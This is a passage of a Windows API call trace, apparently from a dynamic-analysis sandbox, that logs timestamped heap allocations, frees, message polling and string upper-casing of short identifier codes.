Flags=0x0, Size=0x20) returned 0x2a78110 [0088.951] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0088.951] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0088.951] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78110 | out: hHeap=0x2af0000) returned 1 [0088.951] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0088.951] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa99a0 [0088.951] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0088.951] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0088.951] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0088.951] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0088.951] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0088.952] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0088.952] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0088.952] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0088.952] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0088.952] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0088.952] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0088.952] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0088.952] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78188 | out: hHeap=0x2af0000) returned 1 [0088.952] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0088.952] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0088.952] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0088.952] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0088.952] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0088.952] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0088.952] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ebc0 [0088.952] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0088.952] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ebc0 | out: hHeap=0x2af0000) returned 1 [0088.952] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0088.952] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0088.952] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0088.952] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0088.952] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0088.952] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0088.952] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9bb0 [0088.952] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73e90 [0088.952] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0088.952] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0088.952] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0088.952] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0088.952] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0088.953] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0088.953] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0088.953] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0088.953] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0088.953] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0088.953] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0088.953] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0088.953] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0088.953] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0088.953] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0088.953] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0088.953] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0088.953] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0088.953] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ebc0 [0088.953] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0088.953] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ebc0 | out: hHeap=0x2af0000) returned 1 [0088.953] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0088.953] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0088.953] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0088.953] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0088.953] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0088.953] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0088.953] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0088.953] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0088.953] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0088.953] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0088.953] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0088.953] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0088.953] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0088.953] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f20 [0088.954] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0088.954] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0088.954] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0088.954] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0088.954] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0088.954] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0088.954] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0088.954] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0088.954] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f20 | out: hHeap=0x2af0000) returned 1 [0088.954] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0088.954] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0088.954] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0088.954] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9c10 [0088.954] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0088.954] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa99d0 [0088.954] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9940 [0088.954] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9a78 [0088.954] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0088.954] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0088.954] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9ad8 [0088.954] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9af0 [0088.954] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9b08 [0088.954] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9b20 [0088.954] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9b50 [0088.954] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74088 [0088.954] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fd0 | out: hHeap=0x2af0000) returned 1 [0088.954] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9bf8 [0088.954] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9c88 [0088.955] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9dd8 [0088.955] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e08 [0088.955] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9e68 [0088.955] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9ca0 [0088.955] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0088.955] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e98 [0088.955] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9cd0 [0088.955] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0088.955] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e20 [0088.955] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0088.955] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e20 | out: hHeap=0x2af0000) returned 1 [0088.955] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cd0 | out: hHeap=0x2af0000) returned 1 [0088.955] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e98 | out: hHeap=0x2af0000) returned 1 [0088.955] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0088.955] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0088.955] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c58 [0088.955] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9cb8 [0088.955] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0088.955] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f10 [0088.955] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0088.955] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f10 | out: hHeap=0x2af0000) returned 1 [0088.955] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cb8 | out: hHeap=0x2af0000) returned 1 [0088.955] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c58 | out: hHeap=0x2af0000) returned 1 [0088.955] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0088.955] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0088.955] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0088.955] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0088.955] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0088.955] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0088.956] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0088.956] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0088.956] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0088.956] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0088.956] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0088.956] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0088.956] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c88 | out: hHeap=0x2af0000) returned 1 [0088.956] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e08 | out: hHeap=0x2af0000) returned 1 [0088.956] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dd8 | out: hHeap=0x2af0000) returned 1 [0088.956] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e68 | out: hHeap=0x2af0000) returned 1 [0088.956] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ca0 | out: hHeap=0x2af0000) returned 1 [0088.956] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74088 | out: hHeap=0x2af0000) returned 1 [0088.956] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0088.956] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73e90 | out: hHeap=0x2af0000) returned 1 [0088.956] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0088.956] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0088.956] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0088.956] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0088.956] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b68 [0088.956] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0088.956] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fd0 | out: hHeap=0x2af0000) returned 1 [0088.956] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0088.956] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9a78 [0088.956] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74868 [0088.956] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0088.956] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0088.956] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0088.956] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0088.956] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0088.956] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0088.956] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0088.956] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0088.957] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0088.957] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0088.957] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0088.957] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78188 | out: hHeap=0x2af0000) returned 1 [0088.957] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0088.957] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0088.957] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0088.957] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0088.957] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0088.957] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0088.957] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0088.957] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0088.957] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0088.957] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0088.957] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0088.957] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0088.957] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0088.957] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0088.957] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0088.957] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0088.957] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0088.957] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0088.957] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0088.957] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0088.957] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0088.957] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0088.957] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74868 | out: hHeap=0x2af0000) returned 1 [0088.957] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0088.958] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0088.958] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0088.958] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0088.958] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0088.958] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71e0 | out: hHeap=0x2af0000) returned 1 [0088.958] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0088.958] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0088.958] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0088.958] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e680 | out: hHeap=0x2af0000) returned 1 [0088.958] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0088.958] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0088.958] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0088.958] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0088.958] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0088.958] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0088.958] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0088.958] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0088.958] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0088.958] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0088.971] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0089.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0089.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0089.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3dca020 | out: hHeap=0x2af0000) returned 1 [0089.066] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0089.066] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0089.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0089.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0089.076] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3fdf020 | out: hHeap=0x2af0000) returned 1 [0089.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0089.092] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3dc2020 | out: hHeap=0x2af0000) returned 1 [0089.096] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0089.096] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0089.096] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0089.096] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780e8 | out: hHeap=0x2af0000) returned 1 [0089.096] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0089.096] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78318 | out: hHeap=0x2af0000) returned 1 [0089.096] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0089.188] PeekMessageW (in: 